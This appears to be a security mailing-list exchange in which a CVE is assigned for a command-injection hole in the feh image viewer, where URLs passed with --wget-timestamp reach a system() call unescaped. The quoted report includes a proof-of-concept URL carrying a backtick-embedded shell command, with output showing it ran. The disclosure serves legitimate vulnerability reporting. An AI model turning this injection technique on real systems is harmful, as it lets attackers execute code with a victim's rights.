Re: CVE request: feh

[Josh Bressers <bressers () redhat com>]

Please use CVE-2010-2246

Thanks.

-- 
    JB


----- "Daniel Friesel" <derf () chaosdorf de> wrote:

> Hi,
>
> there is an arbitrary code execution hole in feh versions <= 1.7 down
> to at
> least 1.3.4 (I didn't check earlier ones).
> When the user uses feh to open a remote file (URL) and uses the
> --wget-timestamp option, feh passe the unescaped URL to a system()
> call.
>
> So if an attacker can trick the user into opening an image URL
> containing
> shell metacharacters with feh --wget-timestamp, he is able to execute
> arbitrary shell code with the rights of the user executing feh. This
> requires
> the URL to resolve to an existing file, however. Obfuscating the shell
> code
> with HTTP escapes (like %20) does not seem to work, and a redirect
> (via
> tinyurl or similar) to a malicious URL will also have no effect.
>
> Example:
> remnant /t/feh > ls
> remnant /t/feh > feh --wget-timestamp
> 'https://derf.homelinux.org/stuff/bar`touch lol_hax`.jpg'
> /bin/cp: cannot stat `/tmp/feh_011422_bar.jpg': No such file or
> directory
> feh WARNING: /tmp/feh_011422_000001_bar`touch lol_hax`.jpg does not
> exist - skipping
> feh WARNING: /tmp/feh_011422_000001_bar`touch lol_hax`.jpg - File does
> not exist
> feh - No loadable images specified.
> Use feh --help for detailed usage information
> remnant /t/feh > ls
> lol_hax
> remnant /t/feh >
>
> This has been fixed in feh 1.8:
> <https://derf.homelinux.org/projects/feh/changelog>
>
> Please assign a CVE.
>
> Thanks,
> Daniel